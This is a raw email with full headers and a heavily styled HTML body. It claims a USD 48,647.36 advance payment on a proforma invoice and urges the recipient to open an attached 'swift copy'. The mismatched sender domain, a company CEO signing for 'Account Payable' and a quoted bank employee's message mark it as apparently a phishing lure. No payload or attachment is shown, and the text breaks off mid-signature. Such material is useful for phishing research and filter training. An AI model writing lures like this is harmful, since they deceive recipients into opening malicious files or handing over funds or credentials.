From: Account Payable <kbm@globalupside.com>
To: jose@monkey.org
Subject: USD Bank Transfer Deposits - Remitted on 06/03/2019
Date: 6 Mar 2019 22:14:17 -0800
Message-ID: <20190306221417.FC171C356B812222@globalupside.com>
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0012_E255644B.1E8B29DB"
X-SpamH-Filter: a2-out-001.smtp25.com-x276EQHs011326
X-SpamH-OriginatingIP: 67.225.211.247
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 49

This is a multi-part message in MIME format.

------=_NextPart_000_0012_E255644B.1E8B29DB
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML>

<html><head><title></title>
<meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge">
</head>
<body style=3D"margin: 0.4em;">
<div class=3D"gmail_attr" style=3D"color: rgb(34, 34, 34); text-transform: =
none; text-indent: 0px; letter-spacing: normal; font-family: Arial, Helveti=
ca, sans-serif; font-size: small; font-style: normal; font-weight: 400; wor=
d-spacing: 0px; white-space: normal; orphans: 2; widows: 2; background-colo=
r: rgb(255, 255, 255); font-variant-ligatures: normal; font-variant-caps: n=
ormal; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text=
-decoration-color: initial;" dir=3D"ltr">
<span style=3D"color: rgb(31, 73, 125); font-family: Cambria, serif; font-s=
ize: medium;">Dear Sir,</span><br></div>
<div style=3D"color: rgb(34, 34, 34); text-transform: none; text-indent: 0p=
x; letter-spacing: normal; font-family: Arial, Helvetica, sans-serif; font-=
size: small; font-style: normal; font-weight: 400; word-spacing: 0px; white=
-space: normal; orphans: 2; widows: 2; background-color: rgb(255, 255, 255)=
; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-s=
troke-width: 0px; text-decoration-style: initial; text-decoration-color: in=
itial;" dir=3D"ltr"><div class=3D"gmail_quote"><div>
<div style=3D"text-indent: 0px; background-color: rgb(255, 255, 255); text-=
decoration-style: initial; text-decoration-color: initial;"><div class=3D"g=
mail-m_-7010190684615210327m_-5911051131467615654m_7123222806898719731m_-19=
00036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518c5-yiv6831453=
668ydp4cb9ec72WordSection1_mailru_css_attribute_postfix">
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv8999952094msonormal_mailru_css_attribute_postfix" style=3D'margin: 0c=
m 0cm 0pt; color: rgb(85, 85, 85); text-transform: none; letter-spacing: no=
rmal; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-siz=
e: 13px; font-style: normal; font-weight: 400; word-spacing: 0px; white-spa=
ce: normal; font-variant-ligatures: normal;=20
font-variant-caps: normal;'><span style=3D"color: rgb(31, 73, 125); font-fa=
mily: Cambria, serif; font-size: 10pt;"></span>&nbsp;</p>
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv8999952094msonormal_mailru_css_attribute_postfix" style=3D'margin: 0c=
m 0cm 0pt; color: rgb(85, 85, 85); text-transform: none; letter-spacing: no=
rmal; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-siz=
e: 13px; font-style: normal; font-weight: 400; word-spacing: 0px; white-spa=
ce: normal; font-variant-ligatures: normal;=20
font-variant-caps: normal;'><span style=3D"color: rgb(31, 73, 125); font-fa=
mily: Cambria, serif; font-size: 10pt;"><font size=3D"3">Hope that you are =
well.</font></span></p>
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv8999952094msonormal_mailru_css_attribute_postfix" style=3D'margin: 0c=
m 0cm 0pt; color: rgb(85, 85, 85); text-transform: none; letter-spacing: no=
rmal; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-siz=
e: 13px; font-style: normal; font-weight: 400; word-spacing: 0px; white-spa=
ce: normal; font-variant-ligatures: normal;=20
font-variant-caps: normal;'><span style=3D"color: rgb(31, 73, 125); font-fa=
mily: Cambria, serif; font-size: 10pt;"></span>&nbsp;</p><p class=3D"gmail-=
m_-7010190684615210327m_-5911051131467615654m_7123222806898719731m_-1900036=
346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518c5-yiv8999952094ms=
onormal_mailru_css_attribute_postfix" style=3D"margin: 0cm 0cm 0pt;"><font =
size=3D"3"><font color=3D"#1f497d" face=3D"Cambria, serif"><span style=3D"f=
ont-size: 10pt;">We have remitted the USD<span>&nbsp;</span>
</span>48,647.36<span style=3D"font-size: 10pt;">&nbsp;Dated 05.03.19 for 3=
0% advance payment on Proforma Invoice PSC1705935.</span></font></font></p>=

<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv8999952094msonormal_mailru_css_attribute_postfix" style=3D'margin: 0c=
m 0cm 0pt; color: rgb(85, 85, 85); text-transform: none; letter-spacing: no=
rmal; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-siz=
e: 13px; font-style: normal; font-weight: 400; word-spacing: 0px; white-spa=
ce: normal; font-variant-ligatures: normal;=20
font-variant-caps: normal;'><span style=3D"color: rgb(31, 73, 125); font-fa=
mily: Cambria, serif; font-size: 10pt;"></span>&nbsp;</p>
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv8999952094msonormal_mailru_css_attribute_postfix" style=3D'margin: 0c=
m 0cm 0pt; color: rgb(85, 85, 85); text-transform: none; letter-spacing: no=
rmal; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-siz=
e: 13px; font-style: normal; font-weight: 400; word-spacing: 0px; white-spa=
ce: normal; font-variant-ligatures: normal;=20
font-variant-caps: normal;'><span style=3D"color: rgb(31, 73, 125); font-fa=
mily: Cambria, serif; font-size: 10pt;"><font size=3D"3"><font style=3D"bac=
kground-color: rgb(255, 255, 128);">Please find the attached swift copy for=
 below&nbsp;<font face=3D"Cambria">payment.</font></font></font></span></p>=

<span style=3D"color: rgb(31, 73, 125); text-transform: none; letter-spacin=
g: normal; font-family: Cambria, serif; font-size: 10pt; font-style: normal=
; font-weight: 400; word-spacing: 0px; white-space: normal; font-variant-li=
gatures: normal; font-variant-caps: normal;"><font size=3D"3"><span style=
=3D"font-family: sans-serif; font-size: small;">
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv4031148001ydp4cb9ec72MsoNormal_mailru_css_attribute_postfix" style=3D=
'margin: 0px 0px 1em; font-family: "Helvetica Neue", Helvetica, Arial, sans=
-serif; font-size: 13px;'>&nbsp;</p>
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv8999952094msonormal_mailru_css_attribute_postfix" style=3D'margin: 0c=
m 0cm 0pt; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; fon=
t-size: 13px;'></p>
<table class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_7123222=
806898719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61=
e518c5-yiv4031148001ydp4cb9ec72MsoNormalTable_mailru_css_attribute_postfix =
gmail-m_-7010190684615210327m_-5911051131467615654m_7123222806898719731m_-1=
900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518c5-yiv403114=
8001yahoo-compose-table-card_mailru_css_attribute_postfix" style=3D"border-=
width: 0px; line-height: normal; border-collapse:=20
collapse;" border=3D"1" cellspacing=3D"0" cellpadding=3D"0"><tbody><tr styl=
e=3D"min-height: 15pt;"><td valign=3D"bottom" style=3D"margin: 0px; padding=
: 0cm 5.4pt; border: 1pt solid windowtext; font-family: Roboto, RobotoDraft=
, Helvetica, Arial, sans-serif; min-height: 15pt;">
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv4031148001ydp4cb9ec72MsoNormal_mailru_css_attribute_postfix" style=3D=
'margin: 0px 0px 1em; font-family: "Helvetica Neue", Helvetica, Arial, sans=
-serif; font-size: 13px;'>Transaction Date</p></td>
<td valign=3D"bottom" style=3D"border-width: 1pt 1pt 1pt medium; border-sty=
le: solid solid solid none; margin: 0px; padding: 0cm 5.4pt; font-family: R=
oboto, RobotoDraft, Helvetica, Arial, sans-serif; border-top-color: windowt=
ext; border-right-color: windowtext; border-bottom-color: windowtext; min-h=
eight: 15pt;">
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv4031148001ydp4cb9ec72MsoNormal_mailru_css_attribute_postfix" style=3D=
'margin: 0px 0px 1em; font-family: "Helvetica Neue", Helvetica, Arial, sans=
-serif; font-size: 13px;'>Value Date</p></td>
<td valign=3D"bottom" style=3D"border-width: 1pt 1pt 1pt medium; border-sty=
le: solid solid solid none; margin: 0px; padding: 0cm 5.4pt; font-family: R=
oboto, RobotoDraft, Helvetica, Arial, sans-serif; border-top-color: windowt=
ext; border-right-color: windowtext; border-bottom-color: windowtext; min-h=
eight: 15pt;">
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv4031148001ydp4cb9ec72MsoNormal_mailru_css_attribute_postfix" style=3D=
'margin: 0px 0px 1em; font-family: "Helvetica Neue", Helvetica, Arial, sans=
-serif; font-size: 13px;'>Reference No.</p></td>
<td valign=3D"bottom" style=3D"border-width: 1pt 1pt 1pt medium; border-sty=
le: solid solid solid none; margin: 0px; padding: 0cm 5.4pt; font-family: R=
oboto, RobotoDraft, Helvetica, Arial, sans-serif; border-top-color: windowt=
ext; border-right-color: windowtext; border-bottom-color: windowtext; min-h=
eight: 15pt;">
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv4031148001ydp4cb9ec72MsoNormal_mailru_css_attribute_postfix" style=3D=
'margin: 0px 0px 1em; font-family: "Helvetica Neue", Helvetica, Arial, sans=
-serif; font-size: 13px;'>Description</p></td>
<td valign=3D"bottom" style=3D"border-width: 1pt 1pt 1pt medium; border-sty=
le: solid solid solid none; margin: 0px; padding: 0cm 5.4pt; font-family: R=
oboto, RobotoDraft, Helvetica, Arial, sans-serif; border-top-color: windowt=
ext; border-right-color: windowtext; border-bottom-color: windowtext; min-h=
eight: 15pt;">
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv4031148001ydp4cb9ec72MsoNormal_mailru_css_attribute_postfix" style=3D=
'margin: 0px 0px 1em; font-family: "Helvetica Neue", Helvetica, Arial, sans=
-serif; font-size: 13px;'>Debit Amount</p></td></tr><tr style=3D"min-height=
: 15pt;">
<td valign=3D"bottom" style=3D"border-width: medium 1pt 1pt; border-style: =
none solid solid; margin: 0px; padding: 0cm 5.4pt; font-family: Roboto, Rob=
otoDraft, Helvetica, Arial, sans-serif; min-height: 15pt;">
<p align=3D"right" class=3D"gmail-m_-7010190684615210327m_-5911051131467615=
654m_7123222806898719731m_-1900036346675379066m_585410561934868622ox-b815bf=
7aa4-ox-fc61e518c5-yiv4031148001ydp4cb9ec72MsoNormal_mailru_css_attribute_p=
ostfix" style=3D'margin: 0px 0px 1em; text-align: right; font-family: "Helv=
etica Neue", Helvetica, Arial, sans-serif; font-size: 13px;'>06-03-2019 09:=
18</p></td>
<td valign=3D"bottom" style=3D"border-width: medium 1pt 1pt medium; border-=
style: none solid solid none; margin: 0px; padding: 0cm 5.4pt; font-family:=
 Roboto, RobotoDraft, Helvetica, Arial, sans-serif; min-height: 15pt;">
<p align=3D"right" class=3D"gmail-m_-7010190684615210327m_-5911051131467615=
654m_7123222806898719731m_-1900036346675379066m_585410561934868622ox-b815bf=
7aa4-ox-fc61e518c5-yiv4031148001ydp4cb9ec72MsoNormal_mailru_css_attribute_p=
ostfix" style=3D'margin: 0px 0px 1em; text-align: right; font-family: "Helv=
etica Neue", Helvetica, Arial, sans-serif; font-size: 13px;'>08-03-2019</p>=
</td>
<td valign=3D"bottom" style=3D"border-width: medium 1pt 1pt medium; border-=
style: none solid solid none; margin: 0px; padding: 0cm 5.4pt; font-family:=
 Roboto, RobotoDraft, Helvetica, Arial, sans-serif; min-height: 15pt;">
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv4031148001ydp4cb9ec72MsoNormal_mailru_css_attribute_postfix" style=3D=
'margin: 0px 0px 1em; font-family: "Helvetica Neue", Helvetica, Arial, sans=
-serif; font-size: 13px;'>003BC09180600189</p></td>
<td valign=3D"bottom" style=3D"border-width: medium 1pt 1pt medium; border-=
style: none solid solid none; margin: 0px; padding: 0cm 5.4pt; font-family:=
 Roboto, RobotoDraft, Helvetica, Arial, sans-serif; min-height: 15pt;">
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv4031148001ydp4cb9ec72MsoNormal_mailru_css_attribute_postfix" style=3D=
'margin: 0px 0px 1em; font-family: "Helvetica Neue", Helvetica, Arial, sans=
-serif; font-size: 13px;'>ADVANCE PAYMENT OF IMPORT BILL</p></td>
<td valign=3D"bottom" style=3D"border-width: medium 1pt 1pt medium; border-=
style: none solid solid none; margin: 0px; padding: 0cm 5.4pt; font-family:=
 Roboto, RobotoDraft, Helvetica, Arial, sans-serif; min-height: 15pt;">
<p align=3D"right" class=3D"gmail-m_-7010190684615210327m_-5911051131467615=
654m_7123222806898719731m_-1900036346675379066m_585410561934868622ox-b815bf=
7aa4-ox-fc61e518c5-yiv4031148001ydp4cb9ec72MsoNormal_mailru_css_attribute_p=
ostfix" style=3D'margin: 0px 0px 1em; text-align: right; font-family: "Helv=
etica Neue", Helvetica, Arial, sans-serif; font-size: 13px;'>$48,647.36</p>=
</td></tr></tbody></table>
<p style=3D'margin: 0px 0px 1em; font-family: "Helvetica Neue", Helvetica, =
Arial, sans-serif; font-size: 13px;'></p></span><p class=3D"gmail-m_-701019=
0684615210327m_-5911051131467615654m_7123222806898719731m_-1900036346675379=
066m_585410561934868622ox-b815bf7aa4-ox-fc61e518c5-yiv8999952094msonormal_m=
ailru_css_attribute_postfix" style=3D'margin: 0cm 0cm 0pt; font-family: "He=
lvetica Neue", Helvetica, Arial, sans-serif; font-size: 13px;'><span style=
=3D"font-family: Cambria, serif; font-size: 10pt;">
<font size=3D"3">We would request you to please do acknowledge the fund rec=
eipt once after Bank A/c gets credited.</font></span></p><p class=3D"gmail-=
m_-7010190684615210327m_-5911051131467615654m_7123222806898719731m_-1900036=
346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518c5-yiv8999952094ms=
onormal_mailru_css_attribute_postfix" style=3D'margin: 0cm 0cm 0pt; font-fa=
mily: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 13px;'>
<span style=3D"font-family: Cambria, serif; font-size: 10pt;"><font size=3D=
"3"></font></span>&nbsp;</p><p class=3D"gmail-m_-7010190684615210327m_-5911=
051131467615654m_7123222806898719731m_-1900036346675379066m_585410561934868=
622ox-b815bf7aa4-ox-fc61e518c5-yiv8999952094msonormal_mailru_css_attribute_=
postfix" style=3D'margin: 0cm 0cm 0pt; font-family: "Helvetica Neue", Helve=
tica, Arial, sans-serif; font-size: 13px;'><span style=3D"font-family: Camb=
ria, serif; font-size: 10pt;"><font size=3D"3">
Thanks in advance for your kind attention and prompt response.</font></span=
></p></font><p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m=
_7123222806898719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4=
-ox-fc61e518c5-yiv4031148001ydp4cb9ec72MsoNormal_mailru_css_attribute_postf=
ix" style=3D'margin: 0px 0px 1em; font-family: "Helvetica Neue", Helvetica,=
 Arial, sans-serif; font-size: 13px;'><font size=3D"3"></font><span style=
=3D"font-family: Cambria, serif; font-size: 10pt;">
<font size=3D"3"></font></span>&nbsp;</p></span></div>
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv6831453668ydpa6f86147MsoNormal_mailru_css_attribute_postfix" style=3D=
'margin: 0px 0px 1em; color: rgb(85, 85, 85); text-transform: none; letter-=
spacing: normal; font-family: "Helvetica Neue", Helvetica, Arial, sans-seri=
f; font-size: 13px; font-style: normal; font-weight: 400; word-spacing: 0px=
; white-space: normal; font-variant-ligatures:=20
normal; font-variant-caps: normal;'><span style=3D"color: rgb(31, 73, 125);=
"><font face=3D"Cambria"></font></span>&nbsp;</p>
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv6831453668ydpa6f86147MsoNormal_mailru_css_attribute_postfix" style=3D=
'margin: 0px 0px 1em; color: rgb(85, 85, 85); text-transform: none; letter-=
spacing: normal; font-family: "Helvetica Neue", Helvetica, Arial, sans-seri=
f; font-size: 13px; font-style: normal; font-weight: 400; word-spacing: 0px=
; white-space: normal; font-variant-ligatures:=20
normal; font-variant-caps: normal;'><span style=3D"color: rgb(31, 73, 125);=
"><span id=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_712322280=
6898719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e5=
18c5-yiv0307717952yui_3_16_0_1_1468518482833_8639_mailru_css_attribute_post=
fix" style=3D"font-family: Cambria, serif;">Regards</span></span></p>
<div id=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_712322280689=
8719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518c=
5-yiv0307717952yui_3_16_0_1_1468518482833_8641_mailru_css_attribute_postfix=
" style=3D"color: rgb(85, 85, 85); text-transform: none; letter-spacing: no=
rmal; font-family: sans-serif; font-size: small; font-style: normal; font-w=
eight: 400; word-spacing: 0px; white-space: normal; font-variant-ligatures:=
 normal; font-variant-caps: normal;">
<span id=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv0307717952yui_3_16_0_1_1468518482833_8642_mailru_css_attribute_postfi=
x" style=3D"color: rgb(31, 73, 125); font-family: Cambria, serif;">Mohammad=
 A. Hasan</span></div>
<div id=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_712322280689=
8719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518c=
5-yiv0307717952yui_3_16_0_1_1468518482833_8644_mailru_css_attribute_postfix=
" style=3D"color: rgb(85, 85, 85); text-transform: none; letter-spacing: no=
rmal; font-family: sans-serif; font-size: small; font-style: normal; font-w=
eight: 400; word-spacing: 0px; white-space: normal; font-variant-ligatures:=
 normal; font-variant-caps: normal;">
<span id=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv0307717952yui_3_16_0_1_1468518482833_8645_mailru_css_attribute_postfi=
x" style=3D"color: rgb(31, 73, 125); font-family: Cambria, serif;">Chief Ex=
ecutive Officer</span></div>
<div id=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_712322280689=
8719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518c=
5-yiv0307717952yui_3_16_0_1_1468518482833_8647_mailru_css_attribute_postfix=
" style=3D"color: rgb(85, 85, 85); text-transform: none; letter-spacing: no=
rmal; font-family: sans-serif; font-size: small; font-style: normal; font-w=
eight: 400; word-spacing: 0px; white-space: normal; font-variant-ligatures:=
 normal; font-variant-caps: normal;">
<span id=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv0307717952yui_3_16_0_1_1468518482833_8648_mailru_css_attribute_postfi=
x" style=3D"color: rgb(31, 73, 125); font-family: Cambria, serif;">Super Je=
t Corporation INC.</span></div>
<div id=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_712322280689=
8719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518c=
5-yiv0307717952yui_3_16_0_1_1468518482833_8650_mailru_css_attribute_postfix=
" style=3D"color: rgb(85, 85, 85); text-transform: none; letter-spacing: no=
rmal; font-family: sans-serif; font-size: small; font-style: normal; font-w=
eight: 400; word-spacing: 0px; white-space: normal; font-variant-ligatures:=
 normal; font-variant-caps: normal;">
<span id=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv0307717952yui_3_16_0_1_1468518482833_8651_mailru_css_attribute_postfi=
x" style=3D"color: rgb(31, 73, 125); font-family: Cambria, serif;"></span>&=
nbsp;</div>
<div id=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_712322280689=
8719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518c=
5-yiv0307717952yui_3_16_0_1_1468518482833_8653_mailru_css_attribute_postfix=
" style=3D"color: rgb(85, 85, 85); text-transform: none; letter-spacing: no=
rmal; font-family: sans-serif; font-size: small; font-style: normal; font-w=
eight: 400; word-spacing: 0px; white-space: normal; font-variant-ligatures:=
 normal; font-variant-caps: normal;">
<span id=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv0307717952yui_3_16_0_1_1468518482833_8654_mailru_css_attribute_postfi=
x" style=3D"color: rgb(31, 73, 125); font-family: Cambria, serif;"></span>&=
nbsp;</div>
<div style=3D"color: rgb(85, 85, 85); text-transform: none; letter-spacing:=
 normal; font-family: sans-serif; font-size: small; font-style: normal; fon=
t-weight: 400; word-spacing: 0px; white-space: normal; font-variant-ligatur=
es: normal; font-variant-caps: normal;"><div style=3D"border-width: 1pt med=
ium medium; border-style: solid none none; padding: 3pt 0cm 0cm; border-top=
-color: rgb(181, 196, 223);">
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv6831453668ydpa6f86147MsoNormal_mailru_css_attribute_postfix" style=3D=
'margin: 0px 0px 1em; font-family: "Helvetica Neue", Helvetica, Arial, sans=
-serif; font-size: 13px;'><b><span style=3D"font-size: 10pt;">From:</span><=
/b><span style=3D"font-size: 10pt;">
&nbsp;Anish Chauhan [<a class=3D"gmail-m_-7010190684615210327m_-59110511314=
67615654m_7123222806898719731m_-1900036346675379066m_585410561934868622ox-b=
815bf7aa4-mailto-link gmail-m_-7010190684615210327m_-5911051131467615654m_7=
123222806898719731m_-1900036346675379066m_585410561934868622mailto-link" st=
yle=3D"color: rgb(0, 125, 188); text-decoration: underline;" href=3D"mailto=
:anish.chauhan@hdfcbank.com" target=3D"_blank">anish.chauhan@hdfcbank.com</=
a>]&nbsp;<br clear=3D"none"><b>Sent:</b>
&nbsp; March 06 2019 9:33 AM<br clear=3D"none"><b>To:</b>&nbsp;jose@monkey.=
org<br clear=3D"none"><b>Cc:</b>&nbsp;<a style=3D"color: rgb(34, 34, 34); t=
ext-decoration: none;">'Accounts'</a><br clear=3D"none"><b>Subject:</b>&nbs=
p;Swift Copy for Import Bill Deposit</span></p></div></div>
<p class=3D"gmail-m_-7010190684615210327m_-5911051131467615654m_71232228068=
98719731m_-1900036346675379066m_585410561934868622ox-b815bf7aa4-ox-fc61e518=
c5-yiv6831453668ydpa6f86147MsoNormal_mailru_css_attribute_postfix" style=3D=
'margin: 0px 0px 1em; color: rgb(85, 85, 85); text-transform: none; letter-=
spacing: normal; font-family: "Helvetica Neue", Helvetica, Arial, sans-seri=
f; font-size: 13px; font-style: normal; font-weight: 400; word-spacing: 0px=
; white-space: normal; font-variant-ligatures:=20
normal; font-variant-caps: normal;'>&nbsp;</p></div><div style=3D"color: rg=
b(85, 85, 85); text-transform: none; text-indent: 0px; letter-spacing: norm=
al; font-family: sans-serif; font-size: small; font-style: normal; font-wei=
ght: 400; word-spacing: 0px; white-space: normal; background-color: rgb(255=
, 255, 255); font-variant-ligatures: normal; font-variant-caps: normal; tex=
t-decoration-style: initial; text-decoration-color: initial;"><br clear=3D"=
none"></div>
<div style=3D"color: rgb(85, 85, 85); text-transform: none; text-indent: 0p=
x; letter-spacing: normal; font-family: sans-serif; font-size: small; font-=
style: normal; font-weight: 400; word-spacing: 0px; white-space: normal; ba=
ckground-color: rgb(255, 255, 255); font-variant-ligatures: normal; font-va=
riant-caps: normal; text-decoration-style: initial; text-decoration-color: =
initial;">Dear Sir,</div>
<p style=3D'margin: 0px 0px 1em; color: rgb(85, 85, 85); text-transform: no=
ne; text-indent: 0px; letter-spacing: normal; font-family: "Helvetica Neue"=
, Helvetica, Arial, sans-serif; font-size: small; font-style: normal; font-=
weight: 400; word-spacing: 0px; white-space: normal; background-color: rgb(=
255, 255, 255); font-variant-ligatures: normal; font-variant-caps: normal; =
text-decoration-style: initial; text-decoration-color: initial;'><br clear=
=3D"none"><span style=3D"font-family: sans-serif;">
PFA.</span></p><font face=3D"Arial" style=3D"color: rgb(85, 85, 85); text-t=
ransform: none; text-indent: 0px; letter-spacing: normal; font-family: Aria=
l; font-size: small; font-style: normal; word-spacing: 0px; white-space: no=
rmal; background-color: rgb(255, 255, 255); font-variant-ligatures: normal;=
"><font size=3D"2"></font></font>
<font face=3D"Arial" style=3D"text-transform: none; text-indent: 0px; lette=
r-spacing: normal; font-family: Arial; font-size: 13px; font-style: normal;=
 word-spacing: 0px; white-space: normal; background-color: rgb(255, 255, 25=
5); font-variant-ligatures: normal;"><font size=3D"2"></font></font>
<p style=3D'margin: 0px 0px 1em; color: rgb(85, 85, 85); text-transform: no=
ne; text-indent: 0px; letter-spacing: normal; font-family: "Helvetica Neue"=
, Helvetica, Arial, sans-serif; font-size: small; font-style: normal; font-=
weight: 400; word-spacing: 0px; white-space: normal; background-color: rgb(=
255, 255, 255); font-variant-ligatures: normal; font-variant-caps: normal; =
text-decoration-style: initial; text-decoration-color: initial;'><font face=
=3D"Arial"><font size=3D"2"><br><br><br></font>
<span style=3D"font-family: Style;"><strong><em>Thanks and Regards ,</em></=
strong></span></font><font face=3D"Arial"><font size=3D"2">&nbsp;<br></font=
><span style=3D"font-family: Style;"><strong><em>Anish Chauhan</em></strong=
></span><br></font><span style=3D"font-family: sans-serif;">Trade Sales Man=
ager&nbsp;&nbsp;</span><span style=3D"font-family: sans-serif;">93128 74078=
 &nbsp;-&nbsp;</span><span style=3D"color: rgb(79, 79, 79); font-family: Wi=
ngdings; font-size: xx-small;">*</span>
<font face=3D"Arial" size=3D"2">&nbsp;</font><span style=3D"color: blue; fo=
nt-family: sans-serif;"><em>"<a class=3D"gmail-m_-7010190684615210327m_-591=
1051131467615654m_7123222806898719731m_-1900036346675379066m_58541056193486=
8622ox-b815bf7aa4-mailto-link gmail-m_-7010190684615210327m_-59110511314676=
15654m_7123222806898719731m_-1900036346675379066m_585410561934868622mailto-=
link" style=3D"color: rgb(0, 125, 188); text-decoration: underline;" href=
=3D"mailto:anish.chauhan@hdfcbank.com" target=3D"_blank">
anish.chauhan@hdfcbank.<wbr>com</a></em>&nbsp;"</span><font face=3D"Arial" =
size=3D"2">&nbsp;<br></font><span style=3D"font-family: sans-serif;">&nbsp;=
</span><span style=3D"color: rgb(0, 47, 128); font-family: Vrinda; font-siz=
e: medium;"><strong>RETAIL TRADE &amp; FOREX SERVICES&nbsp;</strong></span>=
<br><span style=3D"font-family: sans-serif; font-size: xx-small;">
Exports &nbsp; &nbsp;| &nbsp; &nbsp;Imports &nbsp; &nbsp;| &nbsp; &nbsp;Ban=
k Guarantee &nbsp; &nbsp;| &nbsp; &nbsp;Letter of Credit &nbsp; &nbsp;| &nb=
sp; &nbsp;FDI &nbsp; &nbsp;| &nbsp; &nbsp;ODI &nbsp; &nbsp;| &nbsp; &nbsp;B=
uyer's Credit &nbsp; &nbsp;| &nbsp; &nbsp;ECB &nbsp; &nbsp;| &nbsp; &nbsp;M=
iscellaneous Remittances &nbsp; &nbsp;| &nbsp; &nbsp;FCY Cash &nbsp; &nbsp;=
| &nbsp; &nbsp;Forex Plus Card &nbsp; &nbsp;| &nbsp; &nbsp;FCY DD &nbsp; &n=
bsp;</span><font face=3D"Arial" size=3D"2">&nbsp;<br>
</font><span style=3D"font-family: sans-serif;"><strong>___________________=
___________<wbr>______________________________<wbr>________________________=
______<wbr>______________________________<wbr>________</strong></span><font=
 face=3D"Arial" size=3D"2">&nbsp;<br></font><span style=3D"font-family: san=
s-serif;">Correspondent bank details &nbsp;- &nbsp;</span>
